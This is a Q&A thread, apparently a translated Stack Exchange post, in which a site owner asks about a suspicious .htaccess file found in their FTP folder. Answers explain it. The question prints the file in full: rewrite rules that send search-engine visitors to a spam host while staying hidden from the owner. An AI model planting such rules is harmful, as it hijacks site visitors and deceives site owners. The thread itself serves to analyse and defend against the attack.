.htaccess可疑文件

20

这已上传到我的FTP文件夹之一。我不熟悉Apache，但仍然好奇-有人可以告诉我该文件试图提交哪种类型的卑鄙行为？谢谢！

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://SPAMMER.info/0/go.php?sid=2 [R,L]

— 亲卵菌
source

1

不错！（以一种邪恶的方式...）基本上是在将所有从搜索引擎访问您网站的人引到SPAMMER.info

— KPWINC 2009年

这曾经发生在我身上。.htaccess添加到我的网站的文件的顶部大约有40行空白行，这让我进一步感到困惑。

— TRiG

15

这会将来自搜索引擎的用户发送到上一个站点SPAMMER.info（请参阅问题历史记录以了解实际站点）。

它会寻找引荐来源网址，以对您隐藏，因为您可能无法通过搜索引擎访问该网站。也就是说，如果直接访问URL，一切似乎都很正常。但是，如果您通过搜索引擎进入，则会被重定向。

注意：这不会影响网络爬虫，因为它们（至少是googlebot）没有设置引荐来源标头。

— 迈克尔·哈伦
source

8

每当用户从搜索引擎访问您网站上的任何页面时，他们都会被重定向到.info垃圾网站。

这很偷偷摸摸-您不会注意到任何错误，因为通常只需输入地址即可。

— 格雷格
source

1

由于它正在查看引荐来源网址，因此它不会重定向通过搜索引擎获得的所有点击吗？

它也不会影响来自Google的链接吗？例如，您在Google上搜索OP的网站，单击该网站，并且由于您来自Google而被重定向了？

是的，仅来自搜索引擎的链接（如我在回答中所说），而不来自搜索引擎搜寻器/漫游器。该答案已经更新，因此现在是正确的。最初表明，这仅适用于机器人。

— Michael Haren

1

添加更多-最有可能是您的ftp凭据泄漏了。也许您已将它们保存在filezilla /总指挥官等中。有大量恶意软件在窃取这些恶意软件，然后“四处走动”-登录ftp帐户，将恶意javascript附加到index.php / html或放置类似的重写文件。

— pQd
source

我正面临这个问题。其他.htaccess文件被修改后的第二天，这将导致内部服务器错误。

— vnix27 2011年